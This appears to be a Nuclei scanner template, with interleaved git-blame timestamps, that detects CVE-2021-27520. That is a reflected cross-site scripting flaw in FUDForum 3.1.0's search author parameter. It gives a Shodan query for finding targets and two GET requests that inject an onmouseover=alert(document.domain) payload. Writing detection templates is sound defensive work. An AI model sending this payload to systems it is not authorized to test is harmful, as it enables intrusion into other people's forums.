2023-03-05 13:42:10 +00:00
id : CVE-2021-27520
info :
2023-03-13 18:12:32 +00:00
name : FUDForum 3.1.0 - Cross-Site Scripting
2023-03-05 13:42:10 +00:00
author : r3Y3r53
severity : medium
description : |
2023-03-13 18:12:32 +00:00
FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
2023-03-05 13:42:10 +00:00
reference :
- https://www.exploit-db.com/exploits/49943
2023-03-05 14:19:20 +00:00
- https://github.com/fudforum/FUDforum/issues/2
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
2023-03-13 18:12:32 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-27520
2023-03-05 14:19:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-27520
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00189
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.55657
2023-03-05 13:42:10 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-03-05 13:42:10 +00:00
shodan-query : html:"FUDforum"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : fudforum
product : fudforum
tags : packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- method : GET
path :
- '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D'
- '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22'
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2023-03-05 13:42:10 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-07-11 19:49:27 +00:00
- onmouseover=alert(document.domain) x=
- FUDforum
2023-03-05 13:42:10 +00:00
condition : and
- type : word
part : header
words :
2023-07-11 19:49:27 +00:00
- text/html
2023-03-05 13:42:10 +00:00
- type : status
status :
- 200